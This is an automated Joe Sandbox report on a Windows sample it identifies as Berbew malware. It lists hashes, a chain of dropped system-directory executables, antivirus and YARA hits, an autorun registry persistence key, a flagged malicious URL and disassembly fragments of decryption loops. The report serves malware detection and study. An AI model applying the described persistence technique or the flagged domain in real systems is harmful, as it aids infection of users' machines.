Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
h879iieoae.exe

Overview

General Information

Sample name:h879iieoae.exe
renamed because original name is a hash value
Original sample name:55f3f17f1a264e2b9a8aa9d5750696688fc4a7bbd530ab74224db9939c974d09.exe
Analysis ID:1545775
MD5:b6ff4e20e2b53b684a7cb84630d836fa
SHA1:58f690a95f195f70e6fc59ce67855941bd817f7a
SHA256:55f3f17f1a264e2b9a8aa9d5750696688fc4a7bbd530ab74224db9939c974d09
Tags:arch-x64arch-x86exeimage-win10v2004-20241007-enlocale-en-usos-windows10-2004-x64systemhatchingtraigeneikiinsightportaluser-NeikiSamples
Infos:

Detection

Berbew
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Berbew
AI detected suspicious sample
Creates an undocumented autostart registry key
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has a writeable .text section
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to search for IE or Outlook window (often done to steal information)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
PE file contains more sections than normal
PE file contains sections with non-standard names
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files

Classification

Process Tree

  • System is w10x64
  • h879iieoae.exe (PID: 6496 cmdline: "C:\Users\user\Desktop\h879iieoae.exe" MD5: B6FF4E20E2B53B684A7CB84630D836FA)
    • Nejhbi32.exe (PID: 6544 cmdline: C:\Windows\system32\Nejhbi32.exe MD5: 0603E4CBD8760D07DD7DCAB05A92238A)
      • Ogjdllpi.exe (PID: 6604 cmdline: C:\Windows\system32\Ogjdllpi.exe MD5: B9761DC0E2D962AEFE92F6E1F3C1F250)
        • Opbieagi.exe (PID: 6648 cmdline: C:\Windows\system32\Opbieagi.exe MD5: 04F64BB1853F025B09D78A47FA5C7F7B)
          • Oglabl32.exe (PID: 6692 cmdline: C:\Windows\system32\Oglabl32.exe MD5: EB5F811B6A66908B38FB889817D5988F)
            • Olijjb32.exe (PID: 6744 cmdline: C:\Windows\system32\Olijjb32.exe MD5: 6E56FF877D11D4ED11AF106FBDDD4ACE)
              • Oeanchcn.exe (PID: 6768 cmdline: C:\Windows\system32\Oeanchcn.exe MD5: 1B2425A45E8ED6237FBE4E56F276A504)
                • Oceoll32.exe (PID: 6824 cmdline: C:\Windows\system32\Oceoll32.exe MD5: 1DB24B47BF090833A70E0BEA68A38D9F)
                  • Onkcje32.exe (PID: 6860 cmdline: C:\Windows\system32\Onkcje32.exe MD5: 7862075539A938767C526CCB7DF7CF4E)
                    • Odekfoij.exe (PID: 6928 cmdline: C:\Windows\system32\Odekfoij.exe MD5: A30DE8FF39A8563F2D7B9E36AD05A4C6)
                      • Ojacofgb.exe (PID: 6992 cmdline: C:\Windows\system32\Ojacofgb.exe MD5: AF41FAF03E8EAED376F154722746385B)
                        • Ppllkpoo.exe (PID: 7064 cmdline: C:\Windows\system32\Ppllkpoo.exe MD5: 38F64F662EE5C7E45202627AA7FCACCC)
                          • Plbmqa32.exe (PID: 7092 cmdline: C:\Windows\system32\Plbmqa32.exe MD5: 40D460D476E3EF9238CDEC233DCA293E)
                            • Plgflqpn.exe (PID: 7084 cmdline: C:\Windows\system32\Plgflqpn.exe MD5: 746D9DB8F43CEAFB79CE4693732F31F4)
                              • Pqeoao32.exe (PID: 3808 cmdline: C:\Windows\system32\Pqeoao32.exe MD5: A195A0011B7154E41E7FCDE5D8B4E0CA)
                                • Qgcpihjl.exe (PID: 2896 cmdline: C:\Windows\system32\Qgcpihjl.exe MD5: B46EDD174CAE8D3583851F8A26241E40)
                                  • Ajkolbad.exe (PID: 4956 cmdline: C:\Windows\system32\Ajkolbad.exe MD5: 9A076EA5029217C545E15BC92444072D)
                                    • Bmlhnnne.exe (PID: 2056 cmdline: C:\Windows\system32\Bmlhnnne.exe MD5: A98CEA1775884370D8699936D1B8E227)
                                      • Bgamkfnl.exe (PID: 2924 cmdline: C:\Windows\system32\Bgamkfnl.exe MD5: 2DAF6E68C4322E5ABD5103F013110A0D)
                                        • Bqjacldl.exe (PID: 2256 cmdline: C:\Windows\system32\Bqjacldl.exe MD5: D92B3B389B0B969DCC1638C63737002A)
                                          • Bnnampcf.exe (PID: 5640 cmdline: C:\Windows\system32\Bnnampcf.exe MD5: F015A56D85709788B392A68459FEB024)
                                            • Bnpnbp32.exe (PID: 6188 cmdline: C:\Windows\system32\Bnpnbp32.exe MD5: 7E024C6EF36928FEE4659AE588ED4D43)
                                              • Bgibkegc.exe (PID: 1740 cmdline: C:\Windows\system32\Bgibkegc.exe MD5: 0DBB530A0BE511F3DC794C1024460A99)
                                                • Baagdk32.exe (PID: 916 cmdline: C:\Windows\system32\Baagdk32.exe MD5: 1F4BBF60BA2126DD626006EB2F22CA9D)
                                                  • Cfnpmb32.exe (PID: 1188 cmdline: C:\Windows\system32\Cfnpmb32.exe MD5: 3E45EB0DFCF7ACE28698143C3D650109)
                                                    • Ccapffke.exe (PID: 7104 cmdline: C:\Windows\system32\Ccapffke.exe MD5: 713B5E4D81DBB20F5D48D2BC5501A007)
                                                      • Ceampi32.exe (PID: 6460 cmdline: C:\Windows\system32\Ceampi32.exe MD5: 7008B57588331F2C9C3672BB96521844)
                                                        • Cnjaioih.exe (PID: 4284 cmdline: C:\Windows\system32\Cnjaioih.exe MD5: CA30D43E91B9417EA485DABDD1CCD228)
                                                          • Camgpi32.exe (PID: 7180 cmdline: C:\Windows\system32\Camgpi32.exe MD5: AFB7FE6A2325DC169AF337B02D73EA13)
                                                            • Dmfdkj32.exe (PID: 7196 cmdline: C:\Windows\system32\Dmfdkj32.exe MD5: 8A37BEE9F75CA0545946D3034A19B27A)
                                                              • Dnhmjm32.exe (PID: 7212 cmdline: C:\Windows\system32\Dnhmjm32.exe MD5: 305D22424B3635688BD806671F6F8A9C)
                                                                • Dfcboo32.exe (PID: 7228 cmdline: C:\Windows\system32\Dfcboo32.exe MD5: E467DF0B06CAE41308F8F0A6E1F35FBA)
                                                                  • Edgbhcim.exe (PID: 7244 cmdline: C:\Windows\system32\Edgbhcim.exe MD5: 4396DFC06DB43385A7F834F79F6CA36B)
                                                                    • Emogai32.exe (PID: 7260 cmdline: C:\Windows\system32\Emogai32.exe MD5: E5B571BCF3D5D371B03E73AAAE92245B)
                                                                      • Efgkjnfn.exe (PID: 7276 cmdline: C:\Windows\system32\Efgkjnfn.exe MD5: B024F2548F4F6ADC9F3DCD68E53CB2CC)
                                                                        • Eoappk32.exe (PID: 7292 cmdline: C:\Windows\system32\Eoappk32.exe MD5: B8C0A2511B4FA693AE579E90FCE526AD)
                                                                          • Fkogfkdj.exe (PID: 7312 cmdline: C:\Windows\system32\Fkogfkdj.exe MD5: 151422544613301F6704413C52E381B0)
                                                                            • Fhedeo32.exe (PID: 7328 cmdline: C:\Windows\system32\Fhedeo32.exe MD5: 03114EFDB305B36B603B7F89B84FE057)
                                                                              • Feidnc32.exe (PID: 7344 cmdline: C:\Windows\system32\Feidnc32.exe MD5: 635F3B50D2C2626B8575FD1AD6A4CE99)
                                                                                • Foaigifk.exe (PID: 7368 cmdline: C:\Windows\system32\Foaigifk.exe MD5: 1FC2CFC732D1C3E7577F946BB2663E80)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
BerbewNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.berbew

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.1998469389.000000000042A000.00000004.00000001.01000000.00000011.sdmpJoeSecurity_BerbewYara detected BerbewJoe Security
    00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpJoeSecurity_BerbewYara detected BerbewJoe Security
      00000017.00000002.2006552400.000000000042A000.00000004.00000001.01000000.0000001A.sdmpJoeSecurity_BerbewYara detected BerbewJoe Security
        00000025.00000002.2029721811.000000000042A000.00000004.00000001.01000000.00000028.sdmpJoeSecurity_BerbewYara detected BerbewJoe Security
          00000021.00000002.2021263243.000000000042A000.00000004.00000001.01000000.00000024.sdmpJoeSecurity_BerbewYara detected BerbewJoe Security
            Click to see the 75 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            24.2.Cfnpmb32.exe.42aa84.1.raw.unpackJoeSecurity_BerbewYara detected BerbewJoe Security
              3.2.Opbieagi.exe.42aa84.1.raw.unpackJoeSecurity_BerbewYara detected BerbewJoe Security
                25.2.Ccapffke.exe.42aa84.1.raw.unpackJoeSecurity_BerbewYara detected BerbewJoe Security
                  27.2.Cnjaioih.exe.42aa84.1.raw.unpackJoeSecurity_BerbewYara detected BerbewJoe Security
                    19.2.Bqjacldl.exe.400000.0.unpackJoeSecurity_BerbewYara detected BerbewJoe Security
                      Click to see the 75 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: {79FEACFF-FFCE-815E-A900-316290B5B738}, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\h879iieoae.exe, ProcessId: 6496, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger

                      Suricata Signatures

                      No Suricata rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: h879iieoae.exeAvira: detected
                      Antivirus detection for dropped file
                      Source: C:\Windows\SysWOW64\Accicdme.dllAvira: detection malicious, Label: TR/ATRAPS.Gen
                      Source: C:\Windows\SysWOW64\Efgkjnfn.exeAvira: detection malicious, Label: TR/Spy.Qukart.NB
                      Source: C:\Windows\SysWOW64\Bgibkegc.exeAvira: detection malicious, Label: TR/Spy.Qukart.NB
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exeAvira: detection malicious, Label: TR/Spy.Qukart.NB
                      Source: C:\Windows\SysWOW64\Cnjaioih.exeAvira: detection malicious, Label: TR/Spy.Qukart.NB
                      Source: C:\Windows\SysWOW64\Dfcboo32.exeAvira: detection malicious, Label: TR/Spy.Qukart.NB
                      Source: C:\Windows\SysWOW64\Ckaenpam.dllAvira: detection malicious, Label: TR/ATRAPS.Gen
                      Source: C:\Windows\SysWOW64\Baagdk32.exeAvira: detection malicious, Label: TR/Spy.Qukart.NB
                      Source: C:\Windows\SysWOW64\Bnnampcf.exeAvira: detection malicious, Label: TR/Spy.Qukart.NB
                      Source: C:\Windows\SysWOW64\Eoappk32.exeAvira: detection malicious, Label: TR/Spy.Qukart.NB
                      Source: C:\Windows\SysWOW64\Ajikgq32.dllAvira: detection malicious, Label: TR/ATRAPS.Gen
                      Source: C:\Windows\SysWOW64\Ajkolbad.exeAvira: detection malicious, Label: TR/Spy.Qukart.NB
                      Source: C:\Windows\SysWOW64\Chfnmf32.dllAvira: detection malicious, Label: TR/ATRAPS.Gen
                      Source: C:\Windows\SysWOW64\Bdlhdkdf.dllAvira: detection malicious, Label: TR/ATRAPS.Gen
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exeAvira: detection malicious, Label: TR/Spy.Qukart.NB
                      Source: C:\Windows\SysWOW64\Clqdacnn.dllAvira: detection malicious, Label: TR/ATRAPS.Gen
                      Source: C:\Windows\SysWOW64\Dnhmjm32.exeAvira: detection malicious, Label: TR/Spy.Qukart.NB
                      Source: C:\Windows\SysWOW64\Bpghkh32.dllAvira: detection malicious, Label: TR/ATRAPS.Gen
                      Source: C:\Windows\SysWOW64\Edgbhcim.exeAvira: detection malicious, Label: TR/Spy.Qukart.NB
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exeAvira: detection malicious, Label: TR/Spy.Qukart.NB
                      Source: C:\Windows\SysWOW64\Ekpkmk32.dllAvira: detection malicious, Label: TR/ATRAPS.Gen
                      Source: C:\Windows\SysWOW64\Ccapffke.exeAvira: detection malicious, Label: TR/Spy.Qukart.NB
                      Source: C:\Windows\SysWOW64\Ekpjke32.dllAvira: detection malicious, Label: TR/ATRAPS.Gen
                      Source: C:\Windows\SysWOW64\Emogai32.exeAvira: detection malicious, Label: TR/Spy.Qukart.NB
                      Source: C:\Windows\SysWOW64\Ahhhnd32.dllAvira: detection malicious, Label: TR/ATRAPS.Gen
                      Source: C:\Windows\SysWOW64\Camgpi32.exeAvira: detection malicious, Label: TR/Spy.Qukart.NB
                      Source: C:\Windows\SysWOW64\Dmfdkj32.exeAvira: detection malicious, Label: TR/Spy.Qukart.NB
                      Source: C:\Windows\SysWOW64\Ceampi32.exeAvira: detection malicious, Label: TR/Spy.Qukart.NB
                      Source: C:\Windows\SysWOW64\Bqjacldl.exeAvira: detection malicious, Label: TR/Spy.Qukart.NB
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exeAvira: detection malicious, Label: TR/Spy.Qukart.NB
                      Source: C:\Windows\SysWOW64\Akghbg32.dllAvira: detection malicious, Label: TR/ATRAPS.Gen
                      Multi AV Scanner detection for domain / URL
                      Source: http://tat-neftbank.ru/wcmd.htmVirustotal: Detection: 10%Perma Link
                      Multi AV Scanner detection for dropped file
                      Source: C:\Windows\SysWOW64\Accicdme.dllReversingLabs: Detection: 90%
                      Source: C:\Windows\SysWOW64\Ahhhnd32.dllReversingLabs: Detection: 96%
                      Source: C:\Windows\SysWOW64\Ajikgq32.dllReversingLabs: Detection: 91%
                      Source: C:\Windows\SysWOW64\Akghbg32.dllReversingLabs: Detection: 89%
                      Source: C:\Windows\SysWOW64\Bdlhdkdf.dllReversingLabs: Detection: 100%
                      Source: C:\Windows\SysWOW64\Bpghkh32.dllReversingLabs: Detection: 95%
                      Source: C:\Windows\SysWOW64\Chfnmf32.dllReversingLabs: Detection: 88%
                      Source: C:\Windows\SysWOW64\Ckaenpam.dllReversingLabs: Detection: 91%
                      Source: C:\Windows\SysWOW64\Clqdacnn.dllReversingLabs: Detection: 96%
                      Source: C:\Windows\SysWOW64\Ekpjke32.dllReversingLabs: Detection: 96%
                      Source: C:\Windows\SysWOW64\Ekpkmk32.dllReversingLabs: Detection: 96%
                      Source: C:\Windows\SysWOW64\Fcjdhk32.dllReversingLabs: Detection: 96%
                      Source: C:\Windows\SysWOW64\Fehgpcld.dllReversingLabs: Detection: 92%
                      Source: C:\Windows\SysWOW64\Fkdfmkhi.dllReversingLabs: Detection: 88%
                      Source: C:\Windows\SysWOW64\Flhljo32.dllReversingLabs: Detection: 95%
                      Source: C:\Windows\SysWOW64\Foelkeee.dllReversingLabs: Detection: 91%
                      Source: C:\Windows\SysWOW64\Gfdcflnh.dllReversingLabs: Detection: 96%
                      Source: C:\Windows\SysWOW64\Hdgplo32.dllReversingLabs: Detection: 91%
                      Source: C:\Windows\SysWOW64\Hjanmb32.dllReversingLabs: Detection: 91%
                      Source: C:\Windows\SysWOW64\Hjdhea32.dllReversingLabs: Detection: 95%
                      Source: C:\Windows\SysWOW64\Hjjfnehb.dllReversingLabs: Detection: 96%
                      Source: C:\Windows\SysWOW64\Ibbpip32.dllReversingLabs: Detection: 96%
                      Source: C:\Windows\SysWOW64\Ibigijoc.dllReversingLabs: Detection: 88%
                      Source: C:\Windows\SysWOW64\Iemjhp32.dllReversingLabs: Detection: 96%
                      Source: C:\Windows\SysWOW64\Ipqipqal.dllReversingLabs: Detection: 95%
                      Source: C:\Windows\SysWOW64\Jcofqqkm.dllReversingLabs: Detection: 91%
                      Source: C:\Windows\SysWOW64\Jdackq32.dllReversingLabs: Detection: 95%
                      Source: C:\Windows\SysWOW64\Jgemldcp.dllReversingLabs: Detection: 96%
                      Source: C:\Windows\SysWOW64\Kfnpbj32.dllReversingLabs: Detection: 96%
                      Source: C:\Windows\SysWOW64\Khlnhl32.dllReversingLabs: Detection: 100%
                      Source: C:\Windows\SysWOW64\Lbfpda32.dllReversingLabs: Detection: 96%
                      Source: C:\Windows\SysWOW64\Lfcadoap.dllReversingLabs: Detection: 89%
                      Source: C:\Windows\SysWOW64\Lfjejf32.dllReversingLabs: Detection: 96%
                      Multi AV Scanner detection for submitted file
                      Source: h879iieoae.exeReversingLabs: Detection: 81%
                      Source: h879iieoae.exeVirustotal: Detection: 81%Perma Link
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Windows\SysWOW64\Accicdme.dllJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\Efgkjnfn.exeJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\Bgibkegc.exeJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exeJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\Cnjaioih.exeJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\Dfcboo32.exeJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\Ckaenpam.dllJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\Baagdk32.exeJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\Bnnampcf.exeJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\Eoappk32.exeJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\Ajikgq32.dllJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\Ajkolbad.exeJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\Chfnmf32.dllJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\Bdlhdkdf.dllJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exeJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\Clqdacnn.dllJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\Dnhmjm32.exeJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\Bpghkh32.dllJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\Edgbhcim.exeJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exeJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\Ekpkmk32.dllJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\Ccapffke.exeJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\Ekpjke32.dllJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\Emogai32.exeJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\Ahhhnd32.dllJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\Camgpi32.exeJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\Dmfdkj32.exeJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\Ceampi32.exeJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\Bqjacldl.exeJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exeJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\Akghbg32.dllJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: h879iieoae.exeJoe Sandbox ML: detected
                      Source: h879iieoae.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then mov ecx, dword ptr [eax+04h]0_2_00403A6B
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then add ebx, 04h0_2_00403A6B
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then jl 00403A8Fh0_2_00403A6B
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then add eax, 0Ch0_2_00403A6B
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then popad 0_2_00403A6B
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then mov ebx, dword ptr [eax]0_2_0042E00C
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then pop edi0_2_00403AC7
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then mov ebx, 00407EF8h0_2_00403AC7
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then sub ecx, eax0_2_00403AC7
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then xor edx, edx0_2_00403AC7
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then push eax0_2_00403AC7
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then div edi0_2_00403AC7
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then xchg eax, ecx0_2_00403AC7
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then add eax, edi0_2_00403AC7
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then loop 00403B3Eh0_2_00403AC7
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then mov eax, 0042A000h0_2_00403AC7
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then mov ebx, 0042CD70h0_2_00403AC7
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then sub ecx, eax0_2_00403AC7
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then xor edx, edx0_2_00403AC7
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then push eax0_2_00403AC7
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then div edi0_2_00403AC7
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then xchg eax, ecx0_2_00403AC7
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then add eax, edi0_2_00403AC7
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then loop 00403B9Eh0_2_00403AC7
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then popad 0_2_00403AC7
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then je 00403A1Ch0_2_004039CE
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then xor dword ptr [eax], ecx0_2_004039CE
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then inc eax0_2_004039CE
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then jne 004039F2h0_2_004039CE
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then mov eax, 0042A000h0_2_004039CE
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then je 00403A52h0_2_004039CE
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then xor dword ptr [eax], ecx0_2_004039CE
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then add eax, 04h0_2_004039CE
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then jne 00403A3Ah0_2_004039CE
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 4x nop then popad 0_2_004039CE
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then mov ecx, dword ptr [eax+04h]1_2_00403A6B
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then add ebx, 04h1_2_00403A6B
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then jl 00403A8Fh1_2_00403A6B
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then add eax, 0Ch1_2_00403A6B
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then popad 1_2_00403A6B
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then call 0042E00Ch1_2_0042E000
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then xor dword ptr [ebx], edx1_2_0042E00C
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then cmp ebx, ecx1_2_0042E00C
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then jl 0042E030h1_2_0042E00C
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then popad 1_2_0042E00C
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then pop edi1_2_00403AC7
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then mov ebx, 00407EF8h1_2_00403AC7
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then sub ecx, eax1_2_00403AC7
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then xor edx, edx1_2_00403AC7
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then push eax1_2_00403AC7
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then div edi1_2_00403AC7
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then xchg eax, ecx1_2_00403AC7
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then add eax, edi1_2_00403AC7
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then loop 00403B3Eh1_2_00403AC7
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then mov eax, 0042A000h1_2_00403AC7
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then mov ebx, 0042CD70h1_2_00403AC7
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then sub ecx, eax1_2_00403AC7
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then xor edx, edx1_2_00403AC7
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then push eax1_2_00403AC7
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then div edi1_2_00403AC7
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then xchg eax, ecx1_2_00403AC7
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then add eax, edi1_2_00403AC7
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then loop 00403B9Eh1_2_00403AC7
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then popad 1_2_00403AC7
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then je 00403A1Ch1_2_004039CE
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then xor dword ptr [eax], ecx1_2_004039CE
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then inc eax1_2_004039CE
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then jne 004039F2h1_2_004039CE
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then mov eax, 0042A000h1_2_004039CE
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then je 00403A52h1_2_004039CE
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then xor dword ptr [eax], ecx1_2_004039CE
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then add eax, 04h1_2_004039CE
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then jne 00403A3Ah1_2_004039CE
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 4x nop then popad 1_2_004039CE
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then mov ecx, dword ptr [eax+04h]2_2_00403A6B
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then add ebx, 04h2_2_00403A6B
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then jl 00403A8Fh2_2_00403A6B
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then add eax, 0Ch2_2_00403A6B
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then popad 2_2_00403A6B
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then jne 0042E06Ch2_2_0042E000
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then pop edi2_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then mov ebx, 00407EF8h2_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then sub ecx, eax2_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then xor edx, edx2_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then push eax2_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then div edi2_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then xchg eax, ecx2_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 4x nop then add eax, edi2_2_00403AC7
